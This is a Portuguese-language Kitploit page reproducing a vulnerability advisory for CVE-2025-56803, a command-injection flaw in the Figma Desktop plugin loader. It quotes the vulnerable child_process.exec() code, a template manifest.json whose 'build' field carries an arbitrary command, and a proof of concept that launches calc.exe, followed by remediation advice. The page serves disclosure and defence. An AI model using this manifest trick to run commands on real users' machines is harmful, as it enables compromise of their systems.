Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-56803 — Vulnerabilidade de Injeção de Comandos do SO via Execução de Plugins no Aplicativo Desktop do Figma | Kitploit
Ferramentas/GitHubGitHub/yosasasutsut/cve-2025-56803
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubyosasasutsut/cve-2025-56803

CVE-2025-56803

Vulnerabilidade de Injeção de Comandos do SO via Execução de Plugins no Aplicativo Desktop do Figma

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-56803

Vulnerabilidade de Injeção de Comandos do SO via Execução de Plugin no Figma Desktop Application

1. Visão Geral

Ícone do Figma
  • Aplicativo: Figma Desktop Application
  • Versão: 125.6.5
  • Fornecedor: Figma, Inc.
  • CWE: CWE-78: Neutralização Incorreta de Elementos Especiais usados em um Comando do SO ('Injeção de Comando do SO')
  • CVSS: 8.4
  • String do Vetor: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

2. Resumo

O Figma Desktop Application (v125.6.5) contém uma vulnerabilidade de injeção de comandos no carregador de plugins.
Um manifesto de plugin malicioso (manifest.json) pode abusar do campo build, que é passado diretamente para sem validação. Isso permite a execução arbitrária de comandos do SO assim que o plugin é carregado, sem avisos de segurança ou solicitações de confirmação.

child_process.exec()

3. Detalhes

A vulnerabilidade origina-se do código localizado em main.js, que importa o módulo child_process embutido do Node.js:

root@kitploit:~
Zlt = require("child_process")

Posteriormente, se o campo build estiver presente no arquivo manifest.json de um plugin e seu valor for uma string, o aplicativo executa o valor diretamente usando child_process.exec() sem qualquer sanitização ou validação:

root@kitploit:~
if (
  s.build &&
  typeof s.build === "string" &&
  (l.path = process.env.PATH || "",
  await new Promise((g) => {
    (0, Zlt.exec)(s.build, { cwd: i }, (y, I, P) => {
      l.stdout = I;
      l.stderr = P;
      y && (l.buildErrCode = y.code);
      g();
    });
  }),
  l.buildErrCode
)
  return l;

Como resultado, o seguinte arquivo manifest.json contido em um plugin malicioso faria com que o valor do campo build fosse executado como um comando do SO:

root@kitploit:~
{
  "name": "<NAME>",
  "id": "<ID>",
  "api": "1.0.0",
  "main": "code.js",
  "build": "<COMMAND>",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}

Este fluxo de execução está embutido na lógica de manipulação de plugins do Figma, e a inclusão da chamada require("child_process") em main.js confirma que a execução de comandos está integrada diretamente na lógica principal do aplicativo.

4. Prova de Conceito (PoC)

Ao executar um plugin que inclui o seguinte manifest.json malicioso:

root@kitploit:~
{
  "name": "poc",
  "id": "1535549154235958412",
  "api": "1.0.0",
  "main": "code.js",
  "build": "calc.exe",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}

Assim que este plugin é registrado no Figma e executado, o comando do SO especificado (calc.exe) é executado imediatamente.

https://github.com/user-attachments/assets/48e0a47a-0d1c-4a92-b9ff-33e9559fd5e7

5. Recomendações

Embora a execução do campo build seja um recurso oficialmente suportado no Figma Desktop Application, o aplicativo deve evitar depender de campos controlados pelo usuário em manifest.json, como build, sempre que possível.
Se tais campos precisarem ser suportados, eles devem passar por uma validação rigorosa de entrada para evitar injeção de comandos.
Além disso, o uso de child_process.exec() do Node.js deve ser evitado, e alternativas mais seguras com tratamento explícito de argumentos devem ser adotadas.

6. Referências

  • https://www.cve.org/CVERecord?id=CVE-2025-56803
  • https://nvd.nist.gov/vuln/detail/CVE-2025-56803
  • https://www.figma.com/plugin-docs/manifest/
Baixar ferramenta